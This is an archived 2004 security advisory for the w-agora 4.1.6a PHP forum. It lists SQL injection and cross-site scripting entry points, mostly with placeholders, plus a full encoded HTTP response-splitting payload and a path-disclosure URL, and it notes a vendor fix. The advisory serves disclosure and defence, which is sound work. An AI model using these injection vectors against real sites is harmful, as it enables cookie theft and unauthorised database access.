w-agora.txt

w-agora.txt: Posted Oct 7, 2004; Site maxpatrol.com; Multiple vulnerabilities were found in the w-agora forum version 4.1.6a. A remote user can conduct SQL injection, HTTP response splitting and Cross site scripting attacks.; tags | exploit, remote, web, vulnerability, xss, sql injection; SHA-256 | 252158627116de7a2f7d1b59a8370a428edf3f5dfc0dd28f1f3bb1bcd9bb5e5b; Download | Favorite | View

w-agora.txt

http://www.maxpatrol.com/mp_advisory.asp

Title: Multiple vulnerabilities in w-agora  forum
Date: 28.09.04
Severity: Medium
Application: w-agora 4.1.6a, http://www.w-agora/en/download.php
Platform: PHP
 
 I. DESCRIPTION
 
 Multiple vulnerabilities were found in w-agora forum. A remote user 
 can conduct SQL injection attack, HTTP response splitting and Cross
site 
 Scripting attack.

 1. SQL injection
 
redir_url.php?bn=demos_links&key=[SQL]
 
 2. XSS in GET:

download_thread.php?site=support&bn=support_install&thread=[XSS 
 code here]
 
 3. XSS in POST:

 
 POST /login.php HTTP/1.1
 Host: w-agora
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 89
 loginform=1&redirect_url=1&loginuser=[XSS code here]&loginpassword=1
 
  
  POST /forgot_password.php HTTP/1.1
 Host: w-agora
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 48
 go=1&userid=[XSS code here]
 
  
 4. HTTP response splitting
 
/subscribe_thread.php?site=support&bn=support_in
 
stall&thread=%0d%0aContent-Length:%200%0d%0a%0d%0a%20200%20OK%0d%0aConte
nt-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a%3chtml%3eScan
ned%20by%20PTsecurity%3c/html%3e%0d%0a

5. Path discourse
/list.php?bn=support_install&last=19&collapse=|id|

II. IMPACT

----------
A remote user can access the target user's cookies (including
authentication cookies).   
A remote user can cause SQL commands to be executed by the underlying
database.

III. SOLUTION

-------------
Yes
  


IV. VENDOR FIX/RESPONSE

-----------------------


Yes, Fixed in CVS : subscribe_thread.php3,v 1.17, forgot_password.php3
v1.17, include/auth.php v1.45, list.php3 v1.53, 
 

 V. CREDIT

-------------

 This vulnerability was discovered by Positive Technologies using
MaxPatrol (www.maxpatrol.com) - intellectual professional security
scanner. It is able to detect a substantial amount of vulnerabilities
not published yet. MaxPatrol's intelligent algorithms are also capable
to detect a lot of vulnerabilities in custom web-scripts (XSS, SQL and
code injections, HTTP Response splitting and other).

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 87 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
Rodolfo Tavares 4 files
bRpsd 4 files
Google Security Research 3 files
Jann Horn 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

w-agora.txt

w-agora.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

w-agora.txt

Share This

w-agora.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems